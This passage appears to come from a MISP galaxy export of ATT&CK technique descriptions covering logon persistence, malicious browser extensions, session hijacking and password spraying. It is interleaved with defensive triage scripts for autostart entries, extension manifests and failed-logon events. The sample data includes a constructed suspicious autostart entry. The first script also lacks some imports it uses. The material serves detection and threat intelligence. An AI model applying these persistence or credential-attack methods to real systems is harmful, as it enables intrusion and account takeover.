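from dataclasses import dataclass
from typing import Dict, List, Tuple

SAMPLE_FILES: Dict[str, str] = {
    "/etc/xdg/autostart/at-spi-dbus-bus.desktop": """[Desktop Entry]
Type=Application
Name=AT-SPI D-Bus Bus
Exec=/usr/libexec/at-spi-bus-launcher --launch-immediately
OnlyShowIn=GNOME;Unity;
NoDisplay=true
""",
    "/home/alice/.config/autostart/update-check.desktop": """[Desktop Entry]
Type=Application
Name=Update Check
Exec=/bin/sh -c "/home/alice/.cache/.x/agent -d"
NoDisplay=true
""",
    "/home/alice/.config/autostart/dropbox-old.desktop": """[Desktop Entry]
Type=Application
Name=Dropbox
Exec=/home/alice/.dropbox-dist/dropboxd
Hidden=true
""",
}

TRUSTED_DIRS = ("/usr/", "/bin/", "/sbin/", "/opt/", "/snap/")  # assumption: package-managed paths
SHELLS = {"sh", "bash", "dash", "zsh"}


@dataclass
class AutostartEntry:
    path: str
    name: str
    exec_line: str
    program: str
    hidden: bool
    no_display: bool


def exec_tokens(exec_line: str) -> List[str]:
    """Tokenise an Exec line, dropping %f/%u-style field codes."""
    return [t for t in shlex.split(exec_line) if not t.startswith("%")]


def parse_desktop(path: str, text: str) -> AutostartEntry:
    """Parse the [Desktop Entry] group of a .desktop file."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.optionxform = str  # .desktop keys are case-sensitive
    cp.read_string(text)
    sec = cp["Desktop Entry"]
    exec_line = sec.get("Exec", "")
    tokens = exec_tokens(exec_line)
    return AutostartEntry(path=path, name=sec.get("Name", ""), exec_line=exec_line,
                          program=tokens[0] if tokens else "",
                          hidden=sec.getboolean("Hidden", fallback=False),
                          no_display=sec.getboolean("NoDisplay", fallback=False))


def triage(entry: AutostartEntry) -> List[str]:
    """Return the reasons an entry deserves a closer look (empty list if none)."""
    flags: List[str] = []
    if entry.hidden:
        return flags  # Hidden=true: the entry is treated as deleted and never started
    tokens = exec_tokens(entry.exec_line)
    program = entry.program
    if os.path.basename(program) in SHELLS and "-c" in tokens[:-1]:
        flags.append("Exec wraps a command in a shell -c")
        inner = shlex.split(tokens[tokens.index("-c") + 1])
        program = inner[0] if inner else program
    if program.startswith("/") and not program.startswith(TRUSTED_DIRS):
        flags.append(f"program outside package-managed locations: {program}")
    if flags and entry.no_display:
        flags.append("NoDisplay=true keeps the entry out of menu-style listings")
    return flags


def audit_autostart(files: Dict[str, str]) -> List[Tuple[str, List[str]]]:
    """Triage every file and return (path, flags) for the ones that were flagged."""
    results = []
    for path, text in files.items():
        flags = triage(parse_desktop(path, text))
        if flags:
            results.append((path, flags))
    return results


if __name__ == "__main__":
    for path, flags in audit_autostart(SAMPLE_FILES):
        print(path)
        for flag in flags:
            print("  -", flag)
```

Only the user-directory <code>update-check.desktop</code> entry is reported: the system entry runs a program from <code>/usr/libexec</code>, and the hidden entry is never started. When running this against a live host, read the same basename from both directories, since a user entry overrides a system entry of the same name under the Autostart specification.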

The tag is: misp-galaxy:technique="XDG Autostart Entries"

Boot or Logon Autostart Execution

Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.<sup>[[Microsoft Run Key](https://app.tidalcyber.com/references/0d633a50-4afd-4479-898e-1a785f5637da)]</sup><sup>[[MSDN Authentication Packages](https://app.tidalcyber.com/references/e9bb8434-9b6d-4301-bfe2-5c83ceabb020)]</sup><sup>[[Microsoft TimeProvider](https://app.tidalcyber.com/references/cf7c1db8-6282-4ccd-9609-5a012faf70d6)]</sup><sup>[[Cylance Reg Persistence Sept 2013](https://app.tidalcyber.com/references/9e9c745f-19fd-4218-b8dc-85df804ecb70)]</sup><sup>[[Linux Kernel Programming](https://app.tidalcyber.com/references/70f31f19-e0b3-40b1-b8dd-6667557bb334)]</sup> These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.

Since some boot or logon autostart programs run with higher privileges, an adversary may leverage these to elevate privileges.

The tag is: misp-galaxy:technique="Boot or Logon Autostart Execution"

Login Hook

Adversaries may use a Login Hook to establish persistence executed upon user logon. A login hook is a plist file that points to a specific script to execute with root privileges upon user logon. The plist file is located in the <code>/Library/Preferences/com.apple.loginwindow.plist</code> file and can be modified using the <code>defaults</code> command-line utility. This behavior is the same for logout hooks where a script can be executed upon user logout. All hooks require administrator permissions to modify or create hooks.<sup>[[Login Scripts Apple Dev](https://app.tidalcyber.com/references/9c0094b6-a8e3-4f4d-8d2e-33b408d44a06)]</sup><sup>[[LoginWindowScripts Apple Dev](https://app.tidalcyber.com/references/340eb8df-cc22-4b59-8dca-32ec52fd6818)]</sup>

Adversaries can add or insert a path to a malicious script in the <code>com.apple.loginwindow.plist</code> file, using the <code>LoginHook</code> or <code>LogoutHook</code> key-value pair. The malicious script is executed upon the next user login. If a login hook already exists, adversaries can add additional commands to an existing login hook. There can be only one login and logout hook on a system at a time.<sup>[[S1 macOs Persistence](https://app.tidalcyber.com/references/ce952a0d-9c0d-4a51-9564-7cc5d9e43e2c)]</sup><sup>[[Wardle Persistence Chapter](https://app.tidalcyber.com/references/6272b9a2-d704-43f3-9e25-6c434bb5d1ef)]</sup>

Note: Login hooks were deprecated in macOS 10.11 in favor of [Launch Daemon](https://app.tidalcyber.com/technique/eff618a9-6498-4b01-bca1-cd5f3784fc27) and [Launch Agent](https://app.tidalcyber.com/technique/6dbe030c-5f87-4b45-9b6b-5bba2c0fad00).

The tag is: misp-galaxy:technique="Login Hook"

Logon Script (Windows)

Adversaries may use Windows logon scripts automatically executed at logon initialization to establish persistence. Windows allows logon scripts to be run whenever a specific user or group of users log into a system.<sup>[[TechNet Logon Scripts](https://app.tidalcyber.com/references/896cf5dd-3fe7-44ab-bbaf-d8b2b9980dca)]</sup> This is done via adding a path to a script to the <code>HKCU\Environment\UserInitMprLogonScript</code> Registry key.<sup>[[Hexacorn Logon Scripts](https://app.tidalcyber.com/references/bdcdfe9e-1f22-4472-9a86-faefcb5c5618)]</sup>

Adversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary.

The tag is: misp-galaxy:technique="Logon Script (Windows)"

Network Logon Script

Adversaries may use network logon scripts automatically executed at logon initialization to establish persistence. Network logon scripts can be assigned using Active Directory or Group Policy Objects.<sup>[[Petri Logon Script AD](https://app.tidalcyber.com/references/1de42b0a-3dd6-4f75-bcf3-a2373e349a39)]</sup> These logon scripts run with the privileges of the user they are assigned to. Depending on the systems within the network, initializing one of these scripts could apply to more than one or potentially all systems.

Adversaries may use these scripts to maintain persistence on a network. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary.

The tag is: misp-galaxy:technique="Network Logon Script"

RC Scripts

Adversaries may establish persistence by modifying RC scripts, which are executed during a Unix-like system’s startup. These files allow system administrators to map and start custom services at startup for different run levels. RC scripts require root privileges to modify.

Adversaries can establish persistence by adding a malicious binary path or shell commands to <code>rc.local</code>, <code>rc.common</code>, and other RC scripts specific to the Unix-like distribution.<sup>[[IranThreats Kittens Dec 2017](https://app.tidalcyber.com/references/8338ad75-89f2-47d8-b85b-7cbf331bd7cd)]</sup><sup>[[Intezer HiddenWasp Map 2019](https://app.tidalcyber.com/references/dfef8451-031b-42a6-8b78-d25950cc9d23)]</sup> Upon reboot, the system executes the script’s contents as root, resulting in persistence.

Adversary abuse of RC scripts is especially effective for lightweight Unix-like distributions using the root user as default, such as IoT or embedded systems.<sup>[[intezer-kaiji-malware](https://app.tidalcyber.com/references/ef1fbb40-da6f-41d0-a44a-9ff444e2ad89)]</sup>

Several Unix-like systems have moved to Systemd and deprecated the use of RC scripts. This is now a deprecated mechanism in macOS in favor of [Launchd](https://app.tidalcyber.com/technique/).<sup>[[Apple Developer Doco Archive Launchd](https://app.tidalcyber.com/references/41311827-3d81-422a-9b07-ee8ddc2fc7f1)]</sup><sup>[[Startup Items](https://app.tidalcyber.com/references/e36dd211-22e4-4b23-befb-fbfe1a84b866)]</sup> This technique can be used on Mac OS X Panther v10.3 and earlier versions, which still execute the RC scripts.<sup>[[Methods of Mac Malware Persistence](https://app.tidalcyber.com/references/44154472-2894-4161-b23f-46d1b1fd6772)]</sup> To maintain backwards compatibility, some systems, such as Ubuntu, will execute the RC scripts if they exist with the correct file permissions.<sup>[[Ubuntu Manpage systemd rc](https://app.tidalcyber.com/references/6be16aba-a37f-49c4-9a36-51d2676f64e6)]</sup>

The tag is: misp-galaxy:technique="RC Scripts"

Startup Items

Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items.<sup>[[Startup Items](https://app.tidalcyber.com/references/e36dd211-22e4-4b23-befb-fbfe1a84b866)]</sup>

This is technically a deprecated technology (superseded by [Launch Daemon](https://app.tidalcyber.com/technique/eff618a9-6498-4b01-bca1-cd5f3784fc27)), and thus the appropriate folder, <code>/Library/StartupItems</code>, isn’t guaranteed to exist on the system by default, but does appear to exist by default on macOS Sierra. A startup item is a directory whose executable and configuration property list (plist), <code>StartupParameters.plist</code>, reside in the top-level directory.

An adversary can create the appropriate folders/files in the StartupItems directory to register their own persistence mechanism.<sup>[[Methods of Mac Malware Persistence](https://app.tidalcyber.com/references/44154472-2894-4161-b23f-46d1b1fd6772)]</sup> Additionally, since StartupItems run during the bootup phase of macOS, they will run as the elevated root user.

The tag is: misp-galaxy:technique="Startup Items"

Boot or Logon Initialization Scripts

Adversaries may use scripts automatically executed at boot or logon initialization to establish persistence. Initialization scripts can be used to perform administrative functions, which may often execute other programs or send information to an internal logging server. These scripts can vary based on operating system and whether applied locally or remotely.

Adversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary.

An adversary may also be able to escalate their privileges since some boot or logon initialization scripts run with higher privileges.

The tag is: misp-galaxy:technique="Boot or Logon Initialization Scripts"

Browser Extensions

Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser’s app store and generally have access and permissions to everything that the browser can access.<sup>[[Wikipedia Browser Extension](https://app.tidalcyber.com/references/52aef082-3f8e-41b4-af95-6631ce4c9e91)]</sup><sup>[[Chrome Extensions Definition](https://app.tidalcyber.com/references/fe00cee9-54d9-4775-86da-b7db73295bf7)]</sup>

Malicious extensions can be installed into a browser through malicious app store downloads masquerading as legitimate extensions, through social engineering, or by an adversary that has already compromised a system. Security can be limited on browser app stores so it may not be difficult for malicious extensions to defeat automated scanners.<sup>[[Malicious Chrome Extension Numbers](https://app.tidalcyber.com/references/f34fcf1f-370e-4b6e-9cc4-7ee4075faf6e)]</sup> Depending on the browser, adversaries may also manipulate an extension’s update url to install updates from an adversary controlled server or manipulate the mobile configuration file to silently install additional extensions.

Prior to macOS 11, adversaries could silently install browser extensions via the command line using the <code>profiles</code> tool to install malicious <code>.mobileconfig</code> files. In macOS 11+, the <code>profiles</code> tool can no longer install configuration profiles; however, <code>.mobileconfig</code> files can still be planted and installed with user interaction.<sup>[[xorrior chrome extensions macOS](https://app.tidalcyber.com/references/84bfd3a1-bda2-4821-ac52-6af8515e5879)]</sup>

Once the extension is installed, it can browse to websites in the background, steal all information that a user enters into a browser (including credentials), and be used as an installer for a RAT for persistence.<sup>[[Chrome Extension Crypto Miner](https://app.tidalcyber.com/references/ae28f530-40da-451e-89b8-b472340c3e0a)]</sup><sup>[[ICEBRG Chrome Extensions](https://app.tidalcyber.com/references/459bfd4a-7a9b-4d65-b574-acb221428dad)]</sup><sup>[[Banker Google Chrome Extension Steals Creds](https://app.tidalcyber.com/references/93f37adc-d060-4b35-9a4d-62d2ad61cdf3)]</sup><sup>[[Catch All Chrome Extension](https://app.tidalcyber.com/references/eddd2ea8-89c1-40f9-b6e3-37cbdebd210e)]</sup>

There have also been instances of botnets using a persistent backdoor through malicious Chrome extensions.<sup>[[Stantinko Botnet](https://app.tidalcyber.com/references/d81e0274-76f4-43ce-b829-69f761e280dc)]</sup> There have also been similar examples of extensions being used for command & control.<sup>[[Chrome Extension C2 Malware](https://app.tidalcyber.com/references/b0fdf9c7-614b-4269-ba3e-7d8b02aa8502)]</sup>
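The manifest of an installed extension records the two things the text above singles out: where updates come from (the <code>update_url</code> an adversary may redirect to a server they control) and how much of the browser the extension can reach. The following triage script is an added example written for this document, not code from the MISP galaxy, ATT&CK or any browser vendor. It reads a Chrome-style <code>manifest.json</code>, compares the <code>update_url</code> host against the Chrome Web Store update endpoint (<code>clients2.google.com</code>), and summarises permission breadth: sensitive API permissions, host access to every site (in either the Manifest V2 <code>permissions</code> list or the V3 <code>host_permissions</code> list) and content scripts injected into every page. Both manifests are constructed samples, and the sensitive-permission and broad-host-pattern sets are assumptions chosen for the example:

```python
"""Triage a browser extension manifest for update-source and reach.

Added example, not part of the MISP galaxy or ATT&CK. Both manifests are
constructed samples; SENSITIVE_PERMISSIONS and BROAD_HOST_PATTERNS are assumptions.
"""
import json
from typing import Dict, List
from urllib.parse import urlparse

WEBSTORE_UPDATE_HOST = "clients2.google.com"  # host of the Chrome Web Store update_url
SENSITIVE_PERMISSIONS = {"cookies", "webRequest", "webRequestBlocking", "declarativeNetRequest",
                         "history", "tabs", "nativeMessaging", "debugger"}
BROAD_HOST_PATTERNS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}

# Constructed sample: an extension updated from a third-party host with broad reach.
SIDELOADED_MANIFEST = """{
  "manifest_version": 3,
  "name": "Coupon Helper",
  "version": "1.4.2",
  "update_url": "https://updates.example-cdn.invalid/ext/update.xml",
  "permissions": ["cookies", "storage", "webRequest"],
  "host_permissions": ["<all_urls>"],
  "background": {"service_worker": "bg.js"},
  "content_scripts": [{"matches": ["<all_urls>"], "js": ["inject.js"], "run_at": "document_start"}]
}"""

# Constructed sample: a store-distributed extension with minimal permissions.
STORE_MANIFEST = """{
  "manifest_version": 3,
  "name": "Tab Counter",
  "version": "2.0.1",
  "update_url": "https://clients2.google.com/service/update2/crx",
  "permissions": ["storage"],
  "action": {"default_popup": "popup.html"}
}"""


def triage_manifest(text: str) -> Dict[str, object]:
    """Return the extension's name, version and a list of triage findings."""
    m = json.loads(text)
    findings: List[str] = []

    update_url = m.get("update_url")
    if not update_url:
        findings.append("no update_url (unpacked or sideloaded install)")
    else:
        host = (urlparse(update_url).hostname or "").lower()
        if host != WEBSTORE_UPDATE_HOST:
            findings.append(f"update_url served from {host}, not the Web Store")

    perms = set(m.get("permissions", []))
    sensitive = sorted(perms & SENSITIVE_PERMISSIONS)
    if sensitive:
        findings.append("sensitive permissions: " + ", ".join(sensitive))

    # MV2 keeps host patterns in "permissions"; MV3 moves them to "host_permissions".
    host_perms = set(m.get("host_permissions", [])) | (perms & BROAD_HOST_PATTERNS)
    if host_perms & BROAD_HOST_PATTERNS:
        findings.append("host access to every site")

    for script in m.get("content_scripts", []):
        if set(script.get("matches", [])) & BROAD_HOST_PATTERNS:
            findings.append("content script injected into every page: " + ", ".join(script.get("js", [])))

    return {"name": m.get("name"), "version": m.get("version"), "findings": findings}


if __name__ == "__main__":
    for manifest in (SIDELOADED_MANIFEST, STORE_MANIFEST):
        report = triage_manifest(manifest)
        print(f"{report['name']} {report['version']}: {len(report['findings'])} finding(s)")
        for finding in report["findings"]:
            print("  -", finding)
```

Run against a live profile, the same function can be applied to every <code>manifest.json</code> under the browser's extensions directory; an extension whose updates come from outside the store and whose content scripts run on every page is exactly the profile of the credential-stealing and command-and-control cases cited above.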

The tag is: misp-galaxy:technique="Browser Extensions"

Browser Information Discovery

Adversaries may enumerate information about browsers to learn more about compromised environments. Data saved by browsers (such as bookmarks, accounts, and browsing history) may reveal a variety of personal information about users (e.g., banking sites, relationships/interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.<sup>[[Kaspersky Autofill](https://app.tidalcyber.com/references/561ff84d-17ce-511c-af0c-059310f3c129)]</sup>

Browser information may also highlight additional targets after an adversary has access to valid credentials, especially [Credentials In Files](https://app.tidalcyber.com/technique/838c5038-91e7-4648-925e-a142c8c10853) associated with logins cached by a browser.

Specific storage locations vary based on platform and/or application, but browser information is typically stored in local files and databases (e.g., %APPDATA%/Google/Chrome).<sup>[[Chrome Roaming Profiles](https://app.tidalcyber.com/references/cf0bb77d-c7f7-515b-9217-ba9120cdddec)]</sup>

The tag is: misp-galaxy:technique="Browser Information Discovery"

Browser Session Hijacking

Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.<sup>[[Wikipedia Man in the Browser](https://app.tidalcyber.com/references/f8975da7-4c50-4b3b-8ecb-c99c9b3bc20c)]</sup>

A specific example is when an adversary injects software into a browser that allows them to inherit cookies, HTTP sessions, and SSL client certificates of a user, and then use the browser as a way to pivot into an authenticated intranet.<sup>[[Cobalt Strike Browser Pivot](https://app.tidalcyber.com/references/0c1dd453-7281-4ee4-9c8f-bdc401cf48d7)]</sup><sup>[[ICEBRG Chrome Extensions](https://app.tidalcyber.com/references/459bfd4a-7a9b-4d65-b574-acb221428dad)]</sup> Executing browser-based behaviors such as pivoting may require specific process permissions, such as <code>SeDebugPrivilege</code> and/or high-integrity/administrator rights.

Another example involves pivoting browser traffic from the adversary’s browser through the user’s browser by setting up a proxy which will redirect web traffic. This does not alter the user’s traffic in any way, and the proxy connection can be severed as soon as the browser is closed. The adversary assumes the security context of whichever browser process the proxy is injected into. Browsers typically create a new process for each tab that is opened, and permissions and certificates are separated accordingly. With these permissions, an adversary could potentially browse to any resource on an intranet, such as [Sharepoint](https://app.tidalcyber.com/technique/8ac6952d-5add-4cbc-ad39-44943ed3459b) or webmail, that is accessible through the browser and for which the browser has sufficient permissions. Browser pivoting may also bypass security provided by 2-factor authentication.<sup>[[cobaltstrike manual](https://app.tidalcyber.com/references/43277d05-0aa4-4cee-ac41-6f03a49851a9)]</sup>

The tag is: misp-galaxy:technique="Browser Session Hijacking"

Credential Stuffing

Adversaries may use credentials obtained from breach dumps of unrelated accounts to gain access to target accounts through credential overlap. Occasionally, large numbers of username and password pairs are dumped online when a website or service is compromised and the user account credentials accessed. The information may be useful to an adversary attempting to compromise accounts by taking advantage of the tendency for users to use the same passwords across personal and business accounts.

Credential stuffing is a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization’s login failure policies.

Typically, management services over commonly used ports are used when stuffing credentials. Commonly targeted services include the following:

  • SSH (22/TCP)

  • Telnet (23/TCP)

  • FTP (21/TCP)

  • NetBIOS / SMB / Samba (139/TCP & 445/TCP)

  • LDAP (389/TCP)

  • Kerberos (88/TCP)

  • RDP / Terminal Services (3389/TCP)

  • HTTP/HTTP Management Services (80/TCP & 443/TCP)

  • MSSQL (1433/TCP)

  • Oracle (1521/TCP)

  • MySQL (3306/TCP)

  • VNC (5900/TCP)

In addition to management services, adversaries may "target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols," as well as externally facing email applications, such as Office 365.<sup>[[US-CERT TA18-068A 2018](https://app.tidalcyber.com/references/d9992f57-8ff3-432f-b445-937ff4a6ebf9)]</sup>

The tag is: misp-galaxy:technique="Credential Stuffing"

Password Cracking

Adversaries may use password cracking to attempt to recover usable credentials, such as plaintext passwords, when credential material such as password hashes are obtained. [OS Credential Dumping](https://app.tidalcyber.com/technique/368f85f9-2b15-4732-80fe-087694eaf34d) can be used to obtain password hashes, but this may only get an adversary so far when [Pass the Hash](https://app.tidalcyber.com/technique/33486e3e-1104-42d0-8053-34c8c9c4d10f) is not an option. Further, adversaries may leverage [Data from Configuration Repository](https://app.tidalcyber.com/technique/97ef6135-47d4-4b91-8783-c0b5f331340e) in order to obtain hashed credentials for network devices.<sup>[[US-CERT-TA18-106A](https://app.tidalcyber.com/references/1fe55557-94af-4697-a675-884701f70f2a)]</sup>

Techniques to systematically guess the passwords used to compute hashes are available, or the adversary may use a pre-computed rainbow table to crack hashes. Cracking hashes is usually done on adversary-controlled systems outside of the target network.<sup>[[Wikipedia Password cracking](https://app.tidalcyber.com/references/d5ebb79f-b39a-46cb-b546-2db383783a58)]</sup> The plaintext password resulting from a successfully cracked hash may be used to log into systems, resources, and services to which the account has access.

The tag is: misp-galaxy:technique="Password Cracking"

Password Guessing

Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism. An adversary may guess login credentials without prior knowledge of system or environment passwords during an operation by using a list of common passwords. Password guessing may or may not take into account the target’s policies on password complexity or use policies that may lock accounts out after a number of failed attempts.

Guessing passwords can be a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization’s login failure policies.<sup>[[Cylance Cleaver](https://app.tidalcyber.com/references/f0b45225-3ec3-406f-bd74-87f24003761b)]</sup>

Typically, management services over commonly used ports are used when guessing passwords. Commonly targeted services include the following:

  • SSH (22/TCP)

  • Telnet (23/TCP)

  • FTP (21/TCP)

  • NetBIOS / SMB / Samba (139/TCP & 445/TCP)

  • LDAP (389/TCP)

  • Kerberos (88/TCP)

  • RDP / Terminal Services (3389/TCP)

  • HTTP/HTTP Management Services (80/TCP & 443/TCP)

  • MSSQL (1433/TCP)

  • Oracle (1521/TCP)

  • MySQL (3306/TCP)

  • VNC (5900/TCP)

  • SNMP (161/UDP and 162/TCP/UDP)

In addition to management services, adversaries may "target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols," as well as externally facing email applications, such as Office 365.<sup>[[US-CERT TA18-068A 2018](https://app.tidalcyber.com/references/d9992f57-8ff3-432f-b445-937ff4a6ebf9)]</sup> Further, adversaries may abuse network device interfaces (such as wlanAPI) to brute force accessible wifi-router(s) via wireless authentication protocols.<sup>[[Trend Micro Emotet 2020](https://app.tidalcyber.com/references/150327e6-db4b-4588-8cf2-ee131569150b)]</sup>

In default environments, LDAP and Kerberos connection attempts are less likely to trigger events than attempts over SMB, which create Windows "logon failure" event ID 4625.

The tag is: misp-galaxy:technique="Password Guessing"

Password Spraying

Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials. Password spraying uses one password (e.g. 'Password01'), or a small list of commonly used passwords, that may match the complexity policy of the domain. Logins are attempted with that password against many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords.<sup>[[BlackHillsInfosec Password Spraying](https://app.tidalcyber.com/references/f45c7a4b-dafc-4e5c-ad3f-db4b0388a1d7)]</sup>

Typically, management services over commonly used ports are used when password spraying. Commonly targeted services include the following:

  • SSH (22/TCP)

  • Telnet (23/TCP)

  • FTP (21/TCP)

  • NetBIOS / SMB / Samba (139/TCP & 445/TCP)

  • LDAP (389/TCP)

  • Kerberos (88/TCP)

  • RDP / Terminal Services (3389/TCP)

  • HTTP/HTTP Management Services (80/TCP & 443/TCP)

  • MSSQL (1433/TCP)

  • Oracle (1521/TCP)

  • MySQL (3306/TCP)

  • VNC (5900/TCP)

In addition to management services, adversaries may "target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols," as well as externally facing email applications, such as Office 365.<sup>[[US-CERT TA18-068A 2018](https://app.tidalcyber.com/references/d9992f57-8ff3-432f-b445-937ff4a6ebf9)]</sup>

In default environments, LDAP and Kerberos connection attempts are less likely to trigger events than attempts over SMB, which create Windows "logon failure" event ID 4625.
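The lockout trade-off described in the Password Guessing and Password Spraying entries is what a defender can key on in the 4625 events just mentioned: spraying spreads failures thinly across many accounts, brute force concentrates them on one. The following added example (not part of the MISP galaxy or the ATT&CK text it reproduces; the log lines, account names, addresses and thresholds are constructed assumptions) classifies failed-logon bursts per source address:

```python
"""Separate password spraying from single-account brute force in Windows
Security event ID 4625 (logon failure) records.

Added example, not part of the MISP galaxy or the ATT&CK text it
reproduces. The log lines, user names and addresses below are constructed
for illustration; the thresholds are assumptions to tune per environment.
"""
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed sample records: one event per line, fields as key=value.
# 10.0.0.5 tries six different accounts once each (spraying pattern),
# 10.0.0.9 hammers a single account (brute-force pattern),
# 10.0.0.7 is a user mistyping a password twice (benign noise).
SAMPLE_4625 = [
    "2024-01-01T10:00:00 4625 TargetUserName=alice IpAddress=10.0.0.5",
    "2024-01-01T10:00:05 4625 TargetUserName=bob IpAddress=10.0.0.5",
    "2024-01-01T10:00:10 4625 TargetUserName=carol IpAddress=10.0.0.5",
    "2024-01-01T10:00:15 4625 TargetUserName=dave IpAddress=10.0.0.5",
    "2024-01-01T10:00:20 4625 TargetUserName=erin IpAddress=10.0.0.5",
    "2024-01-01T10:00:25 4625 TargetUserName=frank IpAddress=10.0.0.5",
    "2024-01-01T10:01:00 4625 TargetUserName=admin IpAddress=10.0.0.9",
    "2024-01-01T10:01:01 4625 TargetUserName=admin IpAddress=10.0.0.9",
    "2024-01-01T10:01:02 4625 TargetUserName=admin IpAddress=10.0.0.9",
    "2024-01-01T10:01:03 4625 TargetUserName=admin IpAddress=10.0.0.9",
    "2024-01-01T10:01:04 4625 TargetUserName=admin IpAddress=10.0.0.9",
    "2024-01-01T10:01:05 4625 TargetUserName=admin IpAddress=10.0.0.9",
    "2024-01-01T10:02:00 4625 TargetUserName=alice IpAddress=10.0.0.7",
    "2024-01-01T10:02:30 4625 TargetUserName=alice IpAddress=10.0.0.7",
    "2024-01-01T10:03:00 4624 TargetUserName=alice IpAddress=10.0.0.7",
]


def parse_4625(line):
    """Return (timestamp, target_user, source_ip) for a 4625 line, else None."""
    ts, event_id, *fields = line.split()
    if event_id != "4625":
        return None
    kv = dict(f.split("=", 1) for f in fields)
    return datetime.fromisoformat(ts), kv["TargetUserName"], kv["IpAddress"]


def classify_failures(lines, window=timedelta(minutes=10),
                      spray_min_users=5, spray_max_per_user=2,
                      brute_min_attempts=5):
    """Map each source IP to 'password_spraying' or 'brute_force'.

    Spraying: within one window, many distinct accounts each see only a
    few failures (the pattern chosen to stay under lockout thresholds).
    Brute force: one account absorbs many failures in the window.
    Note: Kerberos pre-authentication failures are logged as event 4771
    on the domain controller and are not covered by this 4625 parser.
    """
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse_4625(line)
        if rec:
            per_ip[rec[2]].append(rec)

    findings = {}
    for ip, recs in per_ip.items():
        recs.sort()
        # Slide a window that starts at each failure in turn.
        for i, (start, _, _) in enumerate(recs):
            in_window = [r for r in recs[i:] if r[0] - start <= window]
            per_user = Counter(user for _, user, _ in in_window)
            if (len(per_user) >= spray_min_users
                    and max(per_user.values()) <= spray_max_per_user):
                findings[ip] = "password_spraying"
                break
            if max(per_user.values()) >= brute_min_attempts:
                findings[ip] = "brute_force"
                break
    return findings


if __name__ == "__main__":
    for ip, verdict in sorted(classify_failures(SAMPLE_4625).items()):
        print(f"{ip}: {verdict}")
```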

The tag is: misp-galaxy:technique="Password Spraying"

Brute Force

Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained. Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism. Brute forcing passwords can take place via interaction with a service that will check the validity of those credentials or offline against previously acquired credential data, such as password hashes.

Brute forcing credentials may take place at various points during a breach. For example, adversaries may attempt to brute force access to [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) within a victim environment leveraging knowledge gathered from other post-compromise behaviors such as [OS Credential Dumping](https://app.tidalcyber.com/technique/368f85f9-2b15-4732-80fe-087694eaf34d), [Account Discovery](https://app.tidalcyber.com/technique/6736995e-b9ea-401b-81fa-6caeb7a17ce3), or [Password Policy Discovery](https://app.tidalcyber.com/technique/2bf2e498-99c8-4e36-ad4b-e675d95ac925). Adversaries may also combine brute forcing activity with behaviors such as [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4) as part of Initial Access.

The tag is: misp-galaxy:technique="Brute Force"

Build Image on Host

Adversaries may build a container image directly on a host to bypass defenses that monitor for the retrieval of malicious images from a public registry. A remote <code>build</code> request may be sent to the Docker API that includes a Dockerfile that pulls a vanilla base image, such as alpine, from a public or local registry and then builds a custom image upon it.<sup>[[Docker Build Image](https://app.tidalcyber.com/references/ee708b64-57f3-4b47-af05-1e26b698c21f)]</sup>

An adversary may take advantage of that <code>build</code> API to build a custom image on the host that includes malware downloaded from their C2 server, and then they may utilize [Deploy Container](https://app.tidalcyber.com/technique/2618638c-f6bd-4840-a297-c45076e094a9) using that custom image.<sup>[[Aqua Build Images on Hosts](https://app.tidalcyber.com/references/efd64f41-13cc-4b2b-864c-4d2352cdadcd)]</sup><sup>[[Aqua Security Cloud Native Threat Report June 2021](https://app.tidalcyber.com/references/be9652d5-7531-4143-9c44-aefd019b7a32)]</sup> If the base image is pulled from a public registry, defenses will likely not detect the image as malicious since it’s a vanilla image. If the base image already resides in a local registry, the pull may be considered even less suspicious since the image is already in the environment.

The tag is: misp-galaxy:technique="Build Image on Host"

Clipboard Data

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

For example, on Windows adversaries can access clipboard data by using <code>clip.exe</code> or <code>Get-Clipboard</code>.<sup>[[MSDN Clipboard](https://app.tidalcyber.com/references/2c1b2d58-a5dc-4aee-8bdb-129a81c10408)]</sup><sup>[[clip_win_server](https://app.tidalcyber.com/references/8a961fa1-def0-5efe-8599-62e884d4ea22)]</sup><sup>[[CISA_AA21_200B](https://app.tidalcyber.com/references/633c6045-8990-58ae-85f0-00139aa9a091)]</sup> Additionally, adversaries may monitor and then replace users’ clipboard contents with their own data (e.g., Transmitted Data Manipulation).<sup>[[mining_ruby_reversinglabs](https://app.tidalcyber.com/references/ca2074d8-330b-544e-806f-ddee7b702631)]</sup>

